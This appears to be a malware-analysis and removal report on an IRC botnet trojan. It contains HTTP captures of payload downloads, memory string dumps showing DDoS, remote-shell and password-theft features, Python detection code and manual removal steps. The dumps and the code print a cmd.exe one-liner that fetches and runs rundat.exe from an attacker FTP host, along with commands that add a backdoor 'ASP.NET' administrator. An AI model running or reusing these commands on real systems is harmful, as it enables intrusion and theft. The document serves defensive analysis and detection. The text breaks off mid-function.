HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Sat, 22 Mar 2014 11:18:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=da6191e9b8143e8df9f92ef6df9da84231395487139700; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.whatismyip.com; HttpOnly
Vary: Accept-Encoding
CF-RAY: 10f1fddf2ba1072b-AMS
830..<html>.<head><title>403 Forbidden</title>
<script type="text/javascript">.//<![CDATA[.try{if (!window.
CloudFlare) {var CloudFlare=[{verbose:0,p:1395415713,byc:0,owlid:"cf",
bag2:1,mirage2:{profile:false},oracle:0,paths:{cloudflare:"/cdn-cgi/ne
xp/dok8v=02fcfa4f56/"},atok:"301e86d4e68b4f9490083018b6e4338d",petok:"
fcb473feb94cd35c093199b4a1ab2d93b1ddb512-1395487139-1800",zone:"whatis
myip.com",rocket:"a",apps:{"ga_key":{"ua":"UA-4975660-1","ga_bs":"2"}}
}];document.write('<script type="text/javascript" src="//ajax.cloud
flare.com/cdn-cgi/nexp/dok8v=b064e16429/cloudflare.min.js"><' '\
/script>');}}catch(e){};.//]]>.</script>.<script type="
text/javascript">./* <![CDATA[ */.var _gaq = _gaq || [];._gaq.pu
sh(['_setAccount', 'UA-4975660-1']);._gaq.push(['_trackPageview']);..(
function() {.var ga = document.createElement('script'); ga.type = 'tex
t/javascript'; ga.async = true;.ga.src = ('https:' == document.locatio
n.protocol ? 'hXXps://ssl' : 'hXXp://www') '.google-analytics.com/ga
.js';.var s = document.getElementsByTagName('script')[0]; s.parentNode
.insertBefore(ga, s);.})();..(function(b){(function(a){"__CF"in b&&"DJ
S"in b.__CF?b.__CF.DJS.push(a):"addEventListener"in b?b.addEventListen
er("load",a,!1):b.attachEvent("onload",a)})(function(){"FB"in b&&"Even
t"in FB&&"subscribe"in FB.Event&&(FB.Event.subscribe("edge.create",fun
ction(a){_gaq.push(["_trackSocial","facebook","like",a])}),FB.Event.su
bscribe("edge.remove",function(a){_gaq.push(["_trackSocial","faceb

<<< skipped >>>

GET /uploads/1738599339.ms1.exe?dl=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: directxex.com


HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Sat, 22 Mar 2014 11:18:44 GMT
Content-Type: application/octet-stream
Content-Length: 528384
Connection: keep-alive
Set-Cookie: __cfduid=df99418797b08450fcf1ecb11625a82d61395487124792; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.directxex.com; HttpOnly
Last-Modified: Sat, 15 Mar 2014 01:21:10 GMT
ETag: "5323ab06-81000"
Expires: Mon, 21 Apr 2014 11:18:43 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
CF-RAY: 10f1fd81f37300de-AMS
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......W.x.........
............\.......%.......Rich............................PE..L.....
#S.....................P....................@...............X.........
.@..................................................(....0..@.........
..........................................................8... .......
.............................text...t........................... ..`.d
ata...h2..........................@....rsrc...@....0..................
....@..@l.[J............MSVBVM60.DLL..................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................

<<< skipped >>>

GET / HTTP/1.1
Host: checkip.dyndns.org
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/html
Server: DynDNS-CheckIP/1.0
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 107
<html><head><title>Current IP Check</title></head><body>Current IP Address: 193.138.244.231</body></html>


ooulnvm.exe_1592:

.text
`.rdata
@.data
_WSSh
t1SSSSh
PeekNamedPipe
CreatePipe
KERNEL32.dll
WS2_32.dll
GetCPInfo
%d. %s = %s
[%.2d-%.2d-M %.2d:%.2d:%.2d] %s
[DDoS]: Send error: <%d>.
ddos.random
ddos.ack
ddos.syn
[DOWNLOAD]: Bad URL, or DNS Error: %s.
[UPDATE]: Update failed: Error executing file: %s.
[UPDATE]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.
[DOWNLOAD]: Opened: %s.
[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.
[DOWNLOAD]: CRC Failed (%d != %d).
[DOWNLOAD]: Filesize is incorrect: (%d != %d).
[DOWNLOAD]: Update: %s (%dKB transferred).
[DOWNLOAD]: File download: %s (%dKB transferred).
[DOWNLOAD]: Couldn't open file: %s.
[IDENTD]: Error: server failed, returned: <%d>.
: USERID : UNIX : %s
[IDENTD]: Client connection from IP: %s:%d.
%s %s :%s
PRIVMSG
avicap32.dll
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
ShellExecuteA
shell32.dll
mpr.dll
iphlpapi.dll
dnsapi.dll
netapi32.dll
icmp.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
gdi32.dll
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
advapi32.dll
ExitWindowsEx
user32.dll
kernel32.dll
Avicap32.dll failed. <%d>
Odbc32.dll failed. <%d>
Shell32.dll failed. <%d>
Mpr32.dll failed. <%d>
Iphlpapi.dll failed. <%d>
Dnsapi.dll failed. <%d>
Netapi32.dll failed. <%d>
Icmp.dll failed. <%d>
Wininet.dll failed. <%d>
Ws2_32.dll failed. <%d>
Gdi32.dll failed. <%d>
Advapi32.dll failed. <%d>
User32.dll failed. <%d>
Kernel32.dll failed. <%d>
videos.p0rn-lover.us
support.exe
Supports RAS Connections
g.dat
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunServices
winpass
sqlpassoainstall
databasepassword
databasepass
dbpassword
dbpass
domainpassword
domainpass
loginpass
login
windows
1234567890
123456789
12345678
1234567
pass1234
passwd
password
password1
*@fbi.edu
Ý %dh %dm
[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.
[IDENTD]: Failed to start server, error: <%d>.
[IDENTD]: Server running on Port: 113.
%s %d "%s"
%s\%s
[MAIN]: Connected to %s.
NICK %s
USER %s 0 0 :%s
PASS %s
MODE %s %s
USERHOST %s
[MAIN]: User: %s logged in.
[MAIN]: Password accepted.
[MAIN]: *Failed host auth by: (%s!%s).
NOTICE %s :Host Auth failed (%s!%s).
[MAIN]: *Failed pass auth by: (%s!%s).
NOTICE %s :Your attempt has been logged.
NOTICE %s :Pass auth failed (%s!%s).
[MAIN]: Random nick change: %s
[FTP]: Uploading file: %s to: %s failed.
[FTP]: Uploading file: %s to: %s
ftp.exe
-s:%s
open %s
put %s
%s\%i%i%i.dll
[FTP]: File not found: %s.
[MAIN]: Invalid login slot number: %d.
[MAIN]: No user logged in at slot: %d.
[MAIN]: %s
QUIT :%s
[MAIN]: Status: Ready. Bot Uptime: %s.
[MAIN]: Bot ID: %s.
[THREADS]: Failed to start list thread, error: <%d>.
[MAIN]: Uptime: %s.
[CMD]: Remote shell ready.
[CMD]: Couldn't open remote shell.
[CMD]: Remote shell already running.
[TFTP]: Failed to start server thread, error: <%d>.
[TFTP]: Server started on Port: %d, File: %s, Request: %s.
[TFTP]: Already running.
[MAIN]: Nick changed to: '%s'.
[MAIN]: Joined channel: '%s'.
[MAIN]: Parted channel: '%s'.
[MAIN]: IRC Raw: %s.
[THREADS]: Failed to kill thread: %s.
[THREADS]: Killed thread: %s.
[THREADS]: Stopped: %d thread(s).
[MAIN]: Prefix changed to: '%c'.
[SHELL]: Couldn't open file: %s
[SHELL]: File opened: %s
[MAIN]: Server changed to: '%s'.
[DNS]: Lookup: %s -> %s.
[FILE]: Deleted '%s'.
[VISIT]: Failed to start connection thread, error: <%d>.
[VISIT]: URL: %s.
[CMD]: Commands: %s
[CMD]: Error sending to remote shell.
[MAIN]: Read file failed: %s
[MAIN]: Read file complete: %s
[MAIN]: Gethost: %s.
[MAIN]: Gethost: %s, Command: %s
[MAIN]: Alias added: %s.
[MAIN]: Privmsg: %s: %s.
[MAIN]: Action: %s: %s.
PART %s
[MAIN]: Mode change: %s
MODE %s
[CLONE]: Raw (%s): %s
[CLONE]: Mode (%s): %s
[CLONE]: Nick (%s): %s
JOIN %s %s
[MAIN]: Repeat not allowed in command line: %s
[MAIN]: Repeat: %s
%s %s %s :%s
[UPDATE]: Failed to start download thread, error: <%d>.
[UPDATE]: Downloading update from: %s.
%s%s.exe
[EXEC]: Commands: %s
[EXEC]: Couldn't execute file.
[CLONES]: Failed to start clone thread, error: <%d>.
[CLONES]: Created on %s:%d, in channel %s.
[DDoS]: Failed to start flood thread, error: <%d>.
[DDoS]: Flooding: (%s:%s) for %s seconds.
[DOWNLOAD]: Failed to start transfer thread, error: <%d>.
[DOWNLOAD]: Downloading URL: %s to: %s.
[REDIRECT]: Failed to start redirection thread, error: <%d>.
[REDIRECT]: TCP redirect created from: %s:%d to: %s:%d.
[SCAN]: Failed to start scan thread, error: <%d>.
[SCAN]: Port scan started: %s:%d with delay: %d(ms).
[%s] <%s> %s
[%s] * %s %s
ACTION %s
[UDP]: Failed to start flood thread, error: <%d>.
[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).
ICMP.dll not available
[PING]: Failed to start flood thread, error: <%d>.
[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).
[EMAIL]: Message sent to %s.
helo $rndnick
mail from: <%s>
rcpt to: <%s>
subject: %s
from: %s
udpflood
c_privmsg
. Failed to start flood thread, error: <%d>.
. Flooding: (%s:%s) for %s seconds.
ddos.supersyn
c_join
c_nick
privmsg
[IDENT]: Server stopped. (%d thread(s) stopped.)
mirccmd
c_rndnick
join
nick
tftp
tftpserver
[MAIN]: Login list complete.
%d. %s
-[Login List]-
[CMD]
cmdstop
ocmd
opencmd
[TFTP]
tftpstop
supersyn.stop
TCP redirect
rndnick
$rndnick
NOTICE %s :
PING %s
VERSION %s
[MAIN]: Joined channel: %s.
[MAIN]: User: %s logged out.
:%s%s
NICK
NOTICE %s :%s
[MAIN]: User %s logged out.
PONG %s
%s Error: %s <%d>.
explorer.exe
%%comspec%% /c %s %s
del "%s"
%sdel.bat
%d.%d.%d.%d
[PING]: Finished sending pings to %s.
[PING]: Error sending pings to %s.
[UDP]: Finished sending packets to %s.
[UDP]: Error sending pings to %s.
[REDIRECT]: Failed to start client thread, error: <%d>.
[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.
[REDIRECT]: Failed to start connection thread, error: <%d>.
[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.
PRIVMSG %s :%s
[CMD]: Could not read data from proccess.
[CMD]: Proccess has terminated.
[CMD]: Could not read data from proccess
[CMD]: Failed to start IO thread, error: <%d>.
[CMD]: Remote Command Prompt
cmd.exe
[%s]|
[%d]%s
[SCAN]: IP: %s Port: %d is open.
[SCAN]: Scanning IP: %s, Port: %d.
tftp.exe -i get
IP: %s
[TFTP]: Failed to open file: %s.
[TFTP]: Error: socket() failed, returned: <%d>.
%s: No %s thread found.
%s: %s stopped. (%d thread(s) stopped.)
[VISIT]: Failed to connect to HTTP server.
[VISIT]: Invalid URL.
[VISIT]: Failed to get requested URL from HTTP server.
[VISIT]: URL visited.
zcÁ
[03-22-2014 13:18:45] [DOWNLOAD]: Opened: c:/windows/skype.exe.
ows/skype.exe @ 516.0 KB/sec.
.exe?dl=1 to: c:/windows/skype.exe[03-22-2014 13:18:45] [DOWNLOAD]: Downloaded 516.0 KB to c:/windows/skype.exe @ 516.0 KB/sec.
[03-22-2014 13:18:44] [MAIN]: Joined channel: #fkyou#.
[03-22-2014 13:18:44] [DOWNLOAD]: Downloading URL: http://directxex.com/uploads/1738599339.ms1.exe?dl=1 to: c:/windows/skype.ex
[03-22-2014 13:18:44] [MAIN]: Joined channel: #Security-Check.
[03-22-2014 13:18:44] [DOWNLOAD]: Downloading URL: ftp://upload:upload@178.33.232.15:8989/sys.exe to: c:/windows/bin.exe.
[03-22-2014 13:18:44] [MAIN]: Connected to videos.p0rn-lover.us.
[03-22-2014 13:17:57] [IDENTD]: Server running on Port: 113.
[DOWNLOAD]: Downloading URL: ftp://upload:upload@178.33.232.15:8989/sys.exe to: c:/windows/bin.exe.
DOWNLOAD]: File download: http://directxex.com/uploads/1738599339.ms1.exe?dl=1 (516KB transferred).
e.exe.
%System%\ooulnvm.exe
00000000000000

ooulnvm.exe_1592_rwx_00400000_0009C000:

(strings identical to the ooulnvm.exe_1592 dump above; repeat omitted)

skype.exe_1292:

.text
guard32.dll
sbiedll.dll
advapi32.dll
kernel32.dll

skype.exe_1292_rwx_00401000_00005000:

guard32.dll
sbiedll.dll
advapi32.dll
kernel32.dll

csrss.exe_268:

.text
`.rdata
@.data
.rsrc
t1SSSSh
SSSh8
PSShB
msn.msg
msn.stop
login
firefox
join
USERENV.dll
VkKeyScanA
keybd_event
USER32.dll
ole32.dll
OLEAUT32.dll
TransactNamedPipe
GetWindowsDirectoryA
KERNEL32.dll
MSVCRT.dll
_acmdln
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
WS2_32.dll
ntpass
Exploit FTPD: %d, Total: %d.
%s: %d,
%s Exploit Statistics:
cmd /c echo open jayne.p0rn-lover.us 8989 > i &echo user upload upload >> i &echo binary >> i &echo get rundat.exe >> i &echo quit >> i &ftp -n -s:i &rundat.exe&del i
%s.%s.%s.%s
%s Scan not active.
%s Current IP: %s.
%s Server started, Port: %i, File: %s.
%d.%d.%d.%d
%s Finished at %s:%d after %d minute(s) of scanning.
%s %s:%d, Scan thread: %d, Sub-thread: %d.
%s Failed to initialize critical section, error: <%d>
%s Portscan: %s:%d open.
Failed auth by %s(%s@%s)
Whats up %s? Im ready to rock!
Spy: %s!%s@%s (PM: "%s")
Fail by: %s!%s@%s (Pass Tried: %s)
%s out.
%s already running: <%d>.
Failed to start thread %s, error: <%d>.
[Current task] %s [System uptime] %s [Bot Uptime] %s
Bot installed on: %s.
Go fuck yourself %s.
MSN// Message & Zipfile sent to: %d contacts.
Hey got new sex Pics from me %d. realy Sexy!
MSN// Sent Stats - Messages: %d :: Files: %d :: Message & Files: %d.
Removed by: %s!%s@%s
Advapi.dll Failed
PStore.dll Failed.
%s Failed to parse command.
%s Failed to start scan thread, error: <%d>.
%s %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
%s No subnet class specified, try "-a" or "-b" or "-c"
%s Could not parse external IP.
%s Trying to get external IP.
%s Failed to start scan, no IP specified.
%d.x.x.x
%s Failed to start scan, port is invalid.
%s Already scanning with %d threads. Too many specified.
Updating from %s (%s)
%stempfile%d%d%d%d%d.exe
ftp://%s:%s@%s:%s/%s path: %s
sftp
net localgroup Administrateurs ASP.NET /add
net localgroup Administradors ASP.NET /add
net localgroup Administratoren ASP.NET /add
net localgroup Administrator ASP.NET /add
net localgroup Administrators ASP.NET /add
net user ASP.NET hardcore /add
SYN: Failed to start thread,error: (%d).
SYN: --> (%s:%s) for (%s secs).
FUCKING: --> (%s:%s) for (%s secs).
Downloading %s and saving it to: %s.
Failed to start socks4 daemon (%s)
Socks(4) server started on %s:%i
Starting firefox pstore
FIREFOX Threads
Process Finished: "%s", Total Running Time: %s.
File executed: %s
Unable to create process: "%s"
%s Couldn't parse path, error: <%d>
%.1fkb downloaded to %s (%.1fkbps)
Couldn't open file for writing: %s.
Windows for Workgroups 3.1a
WORKGROUPlQPxf2ISQgEV1bGKWindows 2000 2195
Windows 2000 5.0
Windows 2000 2195
PK11_CheckUserPassword
PK11_GetInternalKeySlot
softokn3.dll
sqlite3.dll
nssutil3.dll
plds4.dll
nspr4.dll
mozcrt19.dll
nss3.dll
plc4.dll
%s %s:%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
\profiles.ini
Application Data\Mozilla\Firefox
signons3.txt
signons2.txt
signons1.txt
pipe\epmapper
\\%s\
Windows 5.1
Windows 5.0
Windows 2000 LAN Manager*
NT LAN Manager *.*
Windows Server 2003 *.*
%s File transfer complete to IP: %s.
%s File transfer complete to IP: %s, File: %s, Size: %s bytes, Total sends: %i.
%s Started send to IP: %s.
200 PORT command successful.
PORT
%s %s LIST request from: %s
425 Passive not supported on this server
215 StnyFtpd
331 Password required
%s %s
%s Couldn't open data connection to: %s:%i, error: <%d>.
Ping Timeout? (%d-%d)%d/%d
Login list completed!
<%i> %s!%s@%s
Logins:
USER TbT * 0 :%s
NICK %s
{%s-%s-%s-%s-%s}
{iNF-%s-%s-%s-%s-%s}
nigzss.txt
TskMultiChatForm.UnicodeClass
__oxFrame.class__
PASS %s
QUIT %s
PONG %s
NICK
PRIVMSG
JOIN
NOTICE %s :%s
PRIVMSG %s :%s
JOIN %s
JOIN %s %s
PART %s
[%s|%s]
shlwapi.dll
pstorec.dll
psapi.dll
userenv.dll
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
ShellExecuteA
shell32.dll
mpr.dll
GetUdpTable
GetTcpTable
iphlpapi.dll
dnsapi.dll
netapi32.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
FtpPutFileA
FtpGetFileA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
RegEnumKeyExA
advapi32.dll
user32.dll
kernel32.dll
%s!%s@%s
NICK {%s-%s-%s-%s-%s}
https:/
http:/
csrss.exe
*!*@fbi.edu
||FTP||
jayne.p0rn-lover.us
rundat.exe
vids.p0rn-lover.us
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
%s\%s
%s Done @ (%iKB Sec)
No %s thread found.
%s thread stopped.
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
\Desktop.ini
\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
http://www.whatismyip.com
http://checkip.dyndns.org
del "%s">nul
if exist "%s" goto Repeat
ping 0.0.0.0>nul
%s\removeMe%i%i%i%i.bat
%s%%s
%d day%s (%0.2d hours & %0.2d mins)
%WinDir%\csrss.exe
193.138.244.231
192.168.220.133
231-ua-upclick.ipsystems.com.ua
||SCAN|| Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 50 threads.
||FTP|| Server started, Port: 8989, File: %WinDir%\csrss.exe.
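
Two groups of strings in this dump are worth a detection on process-creation command lines. The first is the classic Rbot/Sdbot spreader payload: a cmd.exe one-liner that builds an ftp.exe script with echo redirects, fetches rundat.exe from jayne.p0rn-lover.us on port 8989 with the upload/upload credentials, runs it and deletes the script. The second is the set of "net user ASP.NET hardcore /add" and "net localgroup <Administrators, localized> ASP.NET /add" commands that add a backdoor administrator. The decoder and classifier below are an added example, not part of the report and not the bot's code. They assume the input is a command line as logged by a process-creation audit source (Sysmon event 1 or Windows 4688 are the obvious ones); the one-liner is the exact string from the dump, and the group-name list is exactly the set the strings contain.

```python
import re

# The spreader one-liner, verbatim from the csrss.exe strings.
DROPPER_CMDLINE = (
    "cmd /c echo open jayne.p0rn-lover.us 8989 > i &echo user upload upload >> i "
    "&echo binary >> i &echo get rundat.exe >> i &echo quit >> i &ftp -n -s:i &rundat.exe&del i"
)

# Localized Administrators group names: exactly the set the bot tries (strings above).
ADMIN_GROUPS = {"administrators", "administrator", "administratoren",
                "administrateurs", "administradors"}

_ECHO_REDIRECT = re.compile(r"^echo\s+(?P<text>.*?)\s*(?P<op>>>|>)\s*(?P<file>\S+)$", re.I)
_FTP_SCRIPT = re.compile(r"^ftp(\.exe)?\b.*-s:(?P<file>\S+)", re.I)
_NET_USER_ADD = re.compile(r"^net(\.exe)?\s+user\s+(?P<user>\S+)\s+(?P<pw>\S+)\s+/add\b", re.I)
_NET_GROUP_ADD = re.compile(
    r"^net(\.exe)?\s+localgroup\s+(?P<group>\S+)\s+(?P<user>\S+)\s+/add\b", re.I
)


def split_cmd(cmdline):
    """Split a cmd.exe one-liner on the '&' separator and drop a leading 'cmd /c'."""
    segs = [s.strip() for s in cmdline.split("&") if s.strip()]
    if segs:
        segs[0] = re.sub(r"^cmd(\.exe)?\s+/c\s+", "", segs[0], flags=re.I)
    return segs


def decode_echo_ftp_dropper(cmdline):
    """Rebuild the ftp script an echo chain writes; None if the line has no such chain."""
    files, script_file, after_transfer, deleted = {}, None, [], []
    for seg in split_cmd(cmdline):
        if (m := _ECHO_REDIRECT.match(seg)):
            lines = files.setdefault(m.group("file"), [])
            if m.group("op") == ">":      # a single '>' truncates the file first
                lines.clear()
            lines.append(m.group("text"))
        elif (m := _FTP_SCRIPT.match(seg)):
            script_file = m.group("file")
        elif re.match(r"^del\s+", seg, re.I):
            deleted.append(seg.split(None, 1)[1])
        elif script_file is not None:
            after_transfer.append(seg)    # whatever runs once the download is done
    if script_file is None or script_file not in files:
        return None
    info = {"script_file": script_file, "script": "\n".join(files[script_file]),
            "host": None, "port": 21, "user": None, "password": None,
            "fetched": [], "executed": after_transfer, "deleted": deleted}
    for line in files[script_file]:       # interpret the ftp.exe script verbs
        verb, *args = line.split()
        verb = verb.lower()
        if verb == "open" and args:
            info["host"] = args[0]
            if len(args) > 1 and args[1].isdigit():
                info["port"] = int(args[1])
        elif verb == "user" and args:
            info["user"] = args[0]
            info["password"] = args[1] if len(args) > 1 else None
        elif verb in ("get", "recv", "mget"):
            info["fetched"].extend(args)
    return info


def classify_cmdline(cmdline):
    """Sorted tags for one command line; an empty list means nothing of interest."""
    tags = set()
    for seg in split_cmd(cmdline):
        if _FTP_SCRIPT.match(seg):
            tags.add("ftp-scripted-session")
        if _NET_USER_ADD.match(seg):
            tags.add("local-account-add")
        if (m := _NET_GROUP_ADD.match(seg)) and m.group("group").lower() in ADMIN_GROUPS:
            tags.add("admin-group-add")
    if decode_echo_ftp_dropper(cmdline) is not None:
        tags.add("echo-built-ftp-script")
    return sorted(tags)


if __name__ == "__main__":
    info = decode_echo_ftp_dropper(DROPPER_CMDLINE)
    print(info["script"])
    print(info["host"], info["port"], info["user"], info["password"], info["fetched"])
    print(classify_cmdline(DROPPER_CMDLINE))
    print(classify_cmdline("net user ASP.NET hardcore /add"))
```

The reconstructed script is what the victim's ftp.exe actually executes, so it is the right thing to attach to an alert; the host, port and fetched file name come from it rather than from regexes over the raw line, which also makes the decoder indifferent to how many echo segments the attacker used.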

csrss.exe_268_rwx_00400000_0005A000:

(strings identical to the csrss.exe_268 dump above; repeat omitted)


Remove it with Ad-Aware

  1. Download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    ooulnvm.exe:316
    AUE68.exe:464
    skype.exe:984
    skype.exe:444
    %original file name%.exe:1476
    %original file name%.exe:228
    msn.exe:1336
    msn.exe:204

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\aut3.tmp (116736 bytes)
    %Documents and Settings%\%current user%\G73A28.YX3 (92160 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\X7VALIDZ\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (12288 bytes)
    %WinDir%\skype.exe (530432 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\X7VALIDZ\1738599339.ms1[1] (530432 bytes)
    %Documents and Settings%\%current user%\Cookies\test@directxex[1].txt (118 bytes)
    %Documents and Settings%\%current user%\F26D\msn.exe (904976 bytes)
    %Documents and Settings%\All Users\svchost.exe (528384 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\AUE68.exe (757524 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %System%\ooulnvm.exe (771406 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\aut2.tmp (116736 bytes)
    %Documents and Settings%\%current user%\A85F69.MS5 (67072 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\aut4.tmp (68608 bytes)
    %WinDir%\csrss.exe (746376 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices]
    "Supports RAS Connections" = "ooulnvm.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Supports RAS Connections" = "ooulnvm.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Supports RAS Connections" = "ooulnvm.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
    "Supports RAS Connections" = "ooulnvm.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "SunJavaUpdateSched" = "%Documents and Settings%\All Users\svchost.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Remote Registry Service" = "csrss.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives. The csrss.exe strings also carry a "Desktop.ini" template with CLSID={645FF040-5081-101B-9F08-00AA002F954E} (the Recycle Bin class), which makes the folder holding the copy look like a Recycle Bin in Explorer; delete that folder as well.
  7. Check for a local user account named "ASP.NET" and remove it if present: the csrss.exe strings contain "net user ASP.NET hardcore /add" and "net localgroup Administrators ASP.NET /add" (with several localized group names), so the bot can add a backdoor administrator on command.
  8. Treat passwords saved in Firefox and in Protected Storage (Internet Explorer/Outlook) as compromised and change them from a clean machine: the csrss.exe strings reference signons1-3.txt, the NSS functions PK11_GetInternalKeySlot/PK11_CheckUserPassword and pstorec.dll.
  9. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
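
A way to verify that the registry and removable-drive steps above actually took, written as an added example (not Lavasoft's tooling and not part of the report). It parses the text output of "reg query" for the Run/RunServices keys listed above and flags values by the file they point at rather than by value name, because "SunJavaUpdateSched" is also the name the legitimate Java updater uses; csrss.exe and svchost.exe are started by smss.exe and services.exe and never belong in a Run key, so any Run value naming them is a hit regardless of path. It also parses an autorun.inf and a Desktop.ini for the launch entries and the Recycle Bin CLSID. The "reg query" output, the autorun.inf and the Desktop.ini below are constructed for this example to mirror the values on this page; "sample.exe" is a placeholder, since the page does not name the copy written to removable drives.

```python
import configparser
import ntpath
import re

RECYCLE_BIN_CLSID = "{645FF040-5081-101B-9F08-00AA002F954E}"
_RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Services|Once)?$", re.I)
_VALUE = re.compile(r"^\s+(?P<name>.+?)\s+(?P<type>REG_[A-Z_]+)\s+(?P<data>.*)$")

# Names taken from the registry and file lists above. Value names are checked last,
# because a legitimate Java install also uses "SunJavaUpdateSched".
KNOWN_FILE_NAMES = {"ooulnvm.exe"}
KNOWN_VALUE_NAMES = {"supports ras connections", "remote registry service"}
NEVER_IN_RUN = {"csrss.exe", "svchost.exe"}   # started by smss.exe / services.exe, never via Run

# Constructed "reg query" output: the values listed above plus one genuine XP entry
# (ctfmon.exe) that must not be flagged. Columns may be separated by tabs or spaces.
REG_QUERY_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Supports RAS Connections    REG_SZ    ooulnvm.exe
    SunJavaUpdateSched    REG_SZ    C:\Documents and Settings\All Users\svchost.exe
    Remote Registry Service    REG_SZ    csrss.exe

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
"""

# Constructed autorun.inf; the icon line is the one in the csrss.exe strings, the
# executable name is a placeholder.
AUTORUN_INF = r"""[autorun]
open=sample.exe
shellexecute=sample.exe
icon=%SystemRoot%\system32\SHELL32.dll,4
action=Open folder to view files
"""

# Desktop.ini as the strings above describe it: the folder masquerades as the Recycle Bin.
DESKTOP_INI = "[.ShellClassInfo]\nCLSID={645FF040-5081-101B-9F08-00AA002F954E}\n"


def parse_reg_query(text):
    """Turn 'reg query' output into (key, value_name, type, data) tuples."""
    entries, key = [], None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():          # key paths start in column 0
            key = line.strip()
            continue
        m = _VALUE.match(line)
        if m and key:
            entries.append((key, m.group("name"), m.group("type"), m.group("data")))
    return entries


def persistence_hits(entries):
    """Run/RunServices values that belong to this bot, with the reason for each hit."""
    hits = []
    for key, name, _type, data in entries:
        if not _RUN_KEY.search(key):
            continue
        exe = ntpath.basename(data.strip('"')).lower()   # unquoted paths with spaces are kept whole
        if exe in KNOWN_FILE_NAMES:
            reason = "known bot file name"
        elif exe in NEVER_IN_RUN:
            reason = "system binary name that is never started from a Run key"
        elif name.lower() in KNOWN_VALUE_NAMES:
            reason = "value name used by this bot"
        else:
            continue
        hits.append((key, name, data, reason))
    return hits


def _ini(text):
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    return cp


def autorun_targets(text):
    """Executables an autorun.inf launches: open=, shellexecute= and shell\\*\\command=."""
    cp, targets = _ini(text), []
    for section in cp.sections():
        if section.lower() != "autorun":
            continue
        for key, val in cp.items(section):
            k = key.lower()
            if k in ("open", "shellexecute") or (k.startswith("shell\\") and k.endswith("\\command")):
                targets.append((k, val.strip()))
    return targets


def masquerades_as_recycle_bin(text):
    """True when a Desktop.ini gives the folder the Recycle Bin's CLSID."""
    cp = _ini(text)
    for section in cp.sections():
        if section.lower() == ".shellclassinfo":
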